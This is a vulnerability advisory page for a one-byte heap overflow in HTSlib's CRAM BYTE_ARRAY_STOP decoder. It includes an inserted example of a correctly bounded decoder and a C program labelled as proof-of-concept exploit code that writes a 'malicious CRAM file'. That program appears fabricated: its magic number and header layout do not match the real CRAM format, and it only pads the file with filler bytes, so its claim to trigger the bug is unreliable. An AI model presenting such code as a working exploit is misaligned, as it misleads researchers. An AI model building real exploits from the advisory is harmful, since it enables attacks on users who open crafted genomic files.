Security Vulnerability Report
CVE-2026-31969 CVSS 8.1 HIGH

CVE-2026-31969

Published: 2026-03-18 20:16:22
Last Modified: 2026-03-19 13:59:56

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_STOP` method, an out-by-one error in the `cram_byte_array_stop_decode_char()` function check for a full output buffer could result in a single attacker-controlled byte being written beyond the end of a heap allocation. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.
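The advisory describes a full-buffer check in a stop-byte decoder that is off by one. As an added illustration (not HTSlib's code; the function names and the sample bytes here are constructed), this is what a correct BYTE_ARRAY_STOP-style decode loop looks like, with the guard placed before the write and rejecting the exact-fill case so that no byte can land past the end of the output allocation:

```c
/* Added illustration, not HTSlib's code: decode_byte_array_stop and
 * exact_fill_is_safe are hypothetical names used only here. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copy bytes from `in` into `out` until the stop byte is seen, never
 * writing past `out_cap` bytes.  Returns the number of input bytes
 * consumed (including the stop byte), or -1 if the output would
 * overflow or the input ends before a stop byte. */
int decode_byte_array_stop(const uint8_t *in, size_t in_len, uint8_t stop,
                           uint8_t *out, size_t out_cap, size_t *out_len)
{
    size_t n = 0;
    for (size_t i = 0; i < in_len; i++) {
        if (in[i] == stop) {
            *out_len = n;
            return (int)(i + 1);
        }
        /* The check must precede the write and must reject n == out_cap.
         * The off-by-one variant the advisory describes (e.g. testing
         * n > out_cap) allows one extra byte to be written at out[out_cap]. */
        if (n >= out_cap)
            return -1;
        out[n++] = in[i];
    }
    return -1;  /* input exhausted without a stop byte */
}

/* Constructed check: a payload exactly filling the buffer decodes, a payload
 * one byte longer is rejected, and a guard byte after the buffer is intact. */
int exact_fill_is_safe(void)
{
    const uint8_t ok[]  = { 'A', 'C', 'G', 'T', 0x00 };       /* 4 bytes + stop */
    const uint8_t bad[] = { 'A', 'C', 'G', 'T', 'A', 0x00 };  /* 5 bytes + stop */
    uint8_t buf[5];  /* 4 usable bytes plus 1 guard byte */
    size_t n = 0;

    memset(buf, 0xEE, sizeof buf);
    if (decode_byte_array_stop(ok, sizeof ok, 0x00, buf, 4, &n) != 5) return 0;
    if (n != 4 || memcmp(buf, "ACGT", 4) != 0 || buf[4] != 0xEE) return 0;

    memset(buf, 0xEE, sizeof buf);
    if (decode_byte_array_stop(bad, sizeof bad, 0x00, buf, 4, &n) != -1) return 0;
    return buf[4] == 0xEE;  /* guard untouched: nothing written out of bounds */
}
```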

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* (versions before 1.21.1) - VULNERABLE
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* (versions from 1.22 before 1.22.2) - VULNERABLE
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE
HTSlib < 1.21.1
HTSlib < 1.22.2
HTSlib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2026-31969 PoC - Malformed CRAM file triggering heap overflow
// This PoC demonstrates the BYTE_ARRAY_STOP encoding overflow in HTSlib
// Compile: gcc -o poc poc.c -lhts
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// CRAM file structure for triggering BYTE_ARRAY_STOP overflow
typedef struct {
    uint32_t magic;       // CRAM magic number
    uint32_t version;     // CRAM version
    uint32_t file_id;     // File ID
    uint32_t data_size;   // Size of data section
    uint8_t  encoding;    // BYTE_ARRAY_STOP encoding type (value: 2)
    uint8_t  stop_value;  // Stop byte value
    uint16_t flags;       // Encoding flags
    uint32_t data_len;    // Length of payload data
} cram_header_t;

// Craft a malicious CRAM container with BYTE_ARRAY_STOP encoding
void create_malicious_cram(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "Failed to create file\n");
        return;
    }

    // CRAM container header
    cram_header_t header = {
        .magic      = 0x43485241,  // 'CHRA'
        .version    = 0x00000300,
        .file_id    = 1,
        .data_size  = 1024,
        .encoding   = 2,           // BYTE_ARRAY_STOP encoding
        .stop_value = 0x00,
        .flags      = 0x0001,
        .data_len   = 512
    };
    fwrite(&header, sizeof(header), 1, fp);

    // Crafted data that triggers out-by-one error
    // Fill data to exactly fill buffer, then one more byte to overflow
    uint8_t *payload = malloc(1024);
    if (!payload) {
        fprintf(stderr, "Out of memory\n");
        fclose(fp);
        return;
    }
    memset(payload, 'A', 1024);

    // Write payload that will cause buffer overflow when decoded
    fwrite(payload, 1024, 1, fp);

    free(payload);
    fclose(fp);
    printf("Malicious CRAM file created: %s\n", filename);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Usage: %s <output_cram_file>\n", argv[0]);
        return 1;
    }
    create_malicious_cram(argv[1]);
    printf("PoC generated. Use with vulnerable HTSlib version.\n");
    return 0;
}
```

References
